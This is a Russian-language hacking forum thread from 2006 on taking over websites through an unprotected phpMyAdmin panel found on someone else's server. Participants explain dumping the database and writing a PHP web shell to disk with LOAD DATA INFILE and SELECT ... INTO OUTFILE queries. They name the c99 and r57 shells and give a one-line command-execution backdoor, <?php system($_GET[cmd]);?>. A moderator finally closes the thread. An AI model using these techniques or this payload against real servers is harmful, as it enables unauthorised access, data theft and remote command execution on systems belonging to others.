Как залить шелл через PhpMyAdmin?

Discussion in 'Песочница' started by Buga, 15 Feb 2006.

Thread Status:
Not open for further replies.
  1. Buga

    Buga Elder - Старейшина

    Joined:
    29 Jul 2005
    Messages:
    63
    Likes Received:
    8
    Reputations:
    -1
    не знал куда писать но напигу сюда.
    кароче есть форум на сайте ну это фигня там другая фигня.. например:я пишу http://xxx.xxx.ru/admin/ он мне сразу зашол
    [Добро пожаловать в phpMyAdmin 2.4.0

    MySQL 4.1.11 на localhost как xxx@localhost] не попросил не каких паролей не чо как нибудь можно скачать БД ? :confused:
     
  2. Ak3lla

    Ak3lla New Member

    Joined:
    14 Feb 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Да, можно ;)
     
  3. Grrl

    Grrl Elder - Старейшина

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
    ну это воще странно что тебя теда впустили без пасов.. повезло)
    естественно имея доступ к pma можешь делать с базой что угодно редактировать таблицы и естествеено сделать дамп нужной базы.еще можно попробовать залить шел если прав хватит .
    слева выбирааешь нужные базы и днлаешь дамп (экспорт).
     
  4. qPhoenix

    qPhoenix Banned

    Joined:
    15 Dec 2005
    Messages:
    87
    Likes Received:
    50
    Reputations:
    8
    Прости, быть может не правильно понял смысл... через МиСКЛю можно лить шеллы? как? :eek:
     
  5. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Если ничего не путаю, то надо сделать дамп базы, изменить несколько (или даже одну) строк и залить обратно.
    Если правильно понял твой вопрос.
     
  6. Buga

    Buga Elder - Старейшина

    Joined:
    29 Jul 2005
    Messages:
    63
    Likes Received:
    8
    Reputations:
    -1
    блин я в этом phpAdmine не Шарю как там куда захадить то надо ?? там кароче с лева написано
    БД отсутствуют и есть MySQL Создать новую БД и всякой разной Хрени как залить шел ?? поясните Ньюбу :p
     
  7. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    2qPhoenix, Buga выполняем эти команды:
    Шелл будет в /path/to/file/shell.php
     
    1 person likes this.
  8. Buga

    Buga Elder - Старейшина

    Joined:
    29 Jul 2005
    Messages:
    63
    Likes Received:
    8
    Reputations:
    -1
    апять я запутался я же навичок.
    где и как их выполнить ? :confused:
     
  9. Grrl

    Grrl Elder - Старейшина

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
    где выполнять? ну даешь... там в майадмине есть такая ссылка вверху "SQL"
    жмешь ее потом откроется форма в ней пишешь sql запрос и внизу жмешь кнопку "пошел" или "submit" или чо там у теебя..
     
    #9 Grrl, 16 Feb 2006
    Last edited: 16 Feb 2006
  10. qPhoenix

    qPhoenix Banned

    Joined:
    15 Dec 2005
    Messages:
    87
    Likes Received:
    50
    Reputations:
    8
    WinXP, MySQL 4.1.18-nt, таблица 'lol' c текстовым столбцом 'txt', работаю MySQL Query Browser 1.1.20, админки нет (на целевом)
    Пасяб virgoz за идею, правда всего так и не понял =)

    Приступим:
    Загоняем шелл в таблу: LOAD DATA INFILE 'e:/shell/nst.php' INTO TABLE lol; гуд! 2103 строк записано...
    Вынимаем на локалхост: SELECT * FROM lol INTO OUTFILE 'd:/http/shell.php'; гуд! 2103 строк записано...
    Запускаю - белый экран, исходный код - пусто...
    Сравниваю шеллы:
    Исходник - 82*940 байт/2103 строк
    Созданый - 82*547 байт/2156 строк
    пробую прогнать сие еще 3-4 раза и впадаю в отчаяние...

    Плз, втолкуйте в чем ошибка, и желательно поскорее, бо на целевом серваке я тож пару раз проверил... :rolleyes:
     
    #10 qPhoenix, 16 Feb 2006
    Last edited: 16 Feb 2006
  11. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Попробуй с другим Shell'ом. Может прокатит.
     
  12. qPhoenix

    qPhoenix Banned

    Joined:
    15 Dec 2005
    Messages:
    87
    Likes Received:
    50
    Reputations:
    8
    Забыл отписаться: пробовал с99 pre-release 12 и 15 - тот же компот... ставил МиСКЛю 5.0.18 - нифига =(
    недавно прогнал r57 1.23 и 1.24, и c99 beta 5.02.2005 - ваще выдает кучу строк типа: "Row *** was truncated; it contained more data than there were input columns"
     
    #12 qPhoenix, 16 Feb 2006
    Last edited: 16 Feb 2006
  13. Buga

    Buga Elder - Старейшина

    Joined:
    29 Jul 2005
    Messages:
    63
    Likes Received:
    8
    Reputations:
    -1
    Да нету там такой Хрени Где каманды вводить ехх... явно не судьба :mad:
     
  14. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    --> там кароче с лева написано. БД отсутствуют. Наверное поэтому ничего не получается.
    Да, и лить туда 2000 строчек не надо, достаточно этого <?php system($_GET[cmd]);?>.
     
  15. Buga

    Buga Elder - Старейшина

    Joined:
    29 Jul 2005
    Messages:
    63
    Likes Received:
    8
    Reputations:
    -1
    а Где Это Написать ? если не трудно Скажите где ЭТО выполнять Sql Запросы сылку если можно а то я там не могу найти
     
  16. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    В разделе "Уязвимости форумов" не учат пользоваться коммандами скула. PhpMyAdmin сюда отношения не имеет.
    Тема закрыта.
     
    #16 Azazel, 16 Feb 2006
    Last edited: 16 Feb 2006
Loading...
Thread Status:
Not open for further replies.